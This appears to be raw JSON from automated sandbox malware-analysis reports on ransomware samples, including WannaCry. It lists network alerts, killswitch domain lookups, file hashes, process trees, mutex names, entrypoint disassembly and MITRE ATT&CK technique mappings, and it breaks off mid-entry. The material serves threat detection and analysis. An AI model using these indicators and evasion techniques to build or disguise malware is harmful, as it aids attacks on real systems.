<IPv4>/28, <IPv4>/29, <IPv4>/30, <IPv4>/31, <IPv4>/32\"", "origin": "Network Traffic"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-17", "type": 7, "relevance": 9, "name": "Contacts very many different hosts", "description": "Contacted 60 (or more) hosts in at least 22 different countries", "origin": "Network Traffic"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-21", "type": 7, "relevance": 10, "name": "Malicious artifacts seen in the context of a contacted host", "description": "Found malicious artifacts related to \"<IPv4>\" (ASN: , Owner: ): ...\n\n URL: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ (AV positives: 5/64 scanned on 11/05/2017 06:34:28)\n URL: http://iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ (AV positives: 3/64 scanned on 10/30/2017 04:36:42)\n URL: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/favicon.ico (AV positives: 3/64 scanned on 10/27/2017 09:48:54)\n URL: https://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ (AV positives: 1/65 scanned on 07/17/2017 04:18:57)\n URL: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com:~~Cache-Control/ (AV positives: 1/65 scanned on 07/05/2017 17:36:36)\n File SHA256: 1176207d6dcfb5f5ba613980f8e4e564d2c59e6aab787d6abd0a9f79d917a3ac (AV positives: 62/68 scanned on 11/04/2017 17:56:19)\n File SHA256: 9f2f8c37e5a1fd14aebafa20b7ebf51f6d9e024b4b965bfbcd7d08fcf31a8c90 (AV positives: 62/68 scanned on 11/04/2017 10:46:46)\n File SHA256: b0816cd42fe87d3d0d28bf8ff97574a0eda4ebeec44279fec6cbf78246a55894 (AV positives: 62/68 scanned on 11/04/2017 06:40:28)\n File SHA256: a0bc39001c6efcf39dbc6b7684232cce5126dcf0364c37e902714898ec097e94 (AV positives: 61/67 scanned on 11/04/2017 04:54:24)\n File SHA256: c44af40a62fdd4bee2b451a19b5f1f37ead8c452418264de7a9b394331baac91 (AV positives: 63/68 scanned on 11/04/2017 04:50:11)\n File SHA256: 6f7831f76436557131955a8d3d4a3ebdf65ad48a24bae010cd014dfc30bc6e10 (Scanned on 11/04/2017 06:30:07)\n File SHA256: b07a985d10bb2bdfc60e0282693abe404e5e18d7a2ad4315808735eeebc984d7 (Scanned on 11/04/2017 05:56:43)\n File SHA256: 8c85513eb3f4417cfb0b43fb88f16095281417d4ad7bf6e107f9dd49b2210527 (Scanned on 11/04/2017 05:56:36)\n File SHA256: e85a081597e0f27bde337f7f98aedaa0e0ca6a9ac901eda41eecc63189656104 (Scanned on 11/04/2017 05:56:26)\n File SHA256: b5e1f308414c269df5112852d8eb57cf1a0c39a9e5a0451b3e3a4a7d558a8a51 (Scanned on 11/03/2017 06:48:02)", "origin": "Network Traffic"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 62082\n TCP traffic to <IPv4> on port 62096\n TCP traffic to <IPv4> on port 62108\n TCP traffic to <IPv4> on port 62110\n TCP traffic to <IPv4> on port 62120\n TCP traffic to <IPv4> on port 62123\n TCP traffic to <IPv4> on port 62130\n TCP traffic to <IPv4> on port 62133\n TCP traffic to <IPv4> on port 62136\n TCP traffic to <IPv4> on port 62146\n TCP traffic to <IPv4> on port 62149\n TCP traffic to <IPv4> on port 62153\n TCP traffic to <IPv4> on port 62160\n TCP traffic to <IPv4> on port 62161\n TCP traffic to <IPv4> on port 62164\n TCP traffic to <IPv4> on port 62169\n TCP traffic to <IPv4> on port 62175\n TCP traffic to <IPv4> on port 62176\n TCP traffic to <IPv4> on port 62179\n TCP traffic to <IPv4> on port 62185\n TCP traffic to <IPv4> on port 62190\n TCP traffic to <IPv4> on port 62191\n TCP traffic to <IPv4> on port 62193\n TCP traffic to <IPv4> on port 62196\n TCP traffic to <IPv4> on port 62202\n TCP traffic to <IPv4> on port 62206\n TCP traffic to <IPv4> on port 62207\n TCP traffic to <IPv4> on port 62210\n TCP traffic to <IPv4> on port 62213\n TCP traffic to <IPv4> on port 62219\n TCP traffic to <IPv4> on port 62222\n TCP traffic to <IPv4> on port 62223\n TCP traffic to <IPv4> on port 62224\n TCP traffic to <IPv4> on port 62227\n TCP traffic to <IPv4> on port 62231\n TCP traffic to <IPv4> on port 62237\n TCP traffic to <IPv4> on port 62239\n TCP traffic to <IPv4> on port 62240\n TCP traffic to <IPv4> on port 62241\n TCP traffic to <IPv4> on port 62244\n TCP traffic to <IPv4> on port 62249\n TCP traffic to <IPv4> on port 62253\n TCP traffic to <IPv4> on port 62256\n TCP traffic to <IPv4> on port 62257\n TCP traffic to <IPv4> on port 62258\n TCP traffic to <IPv4> on port 62260\n TCP traffic to <IPv4> on port 62263\n TCP traffic to <IPv4> on port 62268\n TCP traffic to <IPv4> on port 62271\n TCP traffic to <IPv4> on port 62274", "origin": "Network Traffic"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "suricata-2", "type": 18, "relevance": 10, "name": "Detected Emerging Threats Alert", "description": "Detected alert \"ET TROJAN Possible WannaCry DNS Lookup 1\" (SID: 2024291, Rev: 3, Severity: 1) categorized as \"A Network Trojan was detected\" (Backdoor, ransomware, trojans, etc.)\n Detected alert \"ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1\" (SID: 2024298, Rev: 3, Severity: 1) categorized as \"A Network Trojan was detected\" (Backdoor, ransomware, trojans, etc.)\n Detected alert \"ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 2\" (SID: 2024299, Rev: 3, Severity: 1) categorized as \"A Network Trojan was detected\" (Backdoor, ransomware, trojans, etc.)\n Detected alert \"ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 4\" (SID: 2024301, Rev: 3, Severity: 1) categorized as \"A Network Trojan was detected\" (Backdoor, ransomware, trojans, etc.)\n Detected alert \"ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 5\" (SID: 2024302, Rev: 3, Severity: 1) categorized as \"A Network Trojan was detected\" (Backdoor, ransomware, trojans, etc.)", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-3", "type": 12, "relevance": 10, "name": "Sample was identified as malicious by a large number of Antivirus engines", "description": "58/67 Antivirus vendors marked sample as malicious (86% detection rate)", "origin": "External System"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-0", "type": 12, "relevance": 8, "name": "Sample was identified as malicious by at least one Antivirus engine", "description": "58/67 Antivirus vendors marked sample as malicious (86% detection rate)", "origin": "External System"}]}
c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0
https://hybrid-analysis.com/sample/c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0
Hybrid Analysis - Ransomware
{"size": 606080, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "submit_name": "c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0", "sha256": "c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0", "av_detect": 87, "vx_family": "Trojan.Generic", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 140, "extracted_files": [{"name": "085cda53603755dc.exe", "file_path": "%TEMP%\\085cda53603755dc.exe", "file_size": 606084, "sha256": "8744bc6d92b56c408b3bb173796ec334dce2eadd35e721f26278cc6090e03cf2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "runtime_process": "085cda53603755dc.exe (PID: 6064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005772", "name": "c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe", "normalized_path": "C:\\c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe", "sha256": "c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0"}, {"uid": "00000000-00005784", "parentuid": "00000000-00005772", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": ":*C:\\c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe *", "sha256": "8744bc6d92b56c408b3bb173796ec334dce2eadd35e721f26278cc6090e03cf2"}, {"uid": "00000000-00006064", "parentuid": "00000000-00005784", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": "a ZZZZZZUSRVG", "sha256": "8744bc6d92b56c408b3bb173796ec334dce2eadd35e721f26278cc6090e03cf2"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 15}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrug\"\n \"Global\\giojheiowrghtiovhjwiojrug\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrugzyb\"\n \"Global\\giojheiowrghtiovhjwiojrugzyb\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"085cda53603755dc.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"\n \"085cda53603755dc.exe\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005772)\n 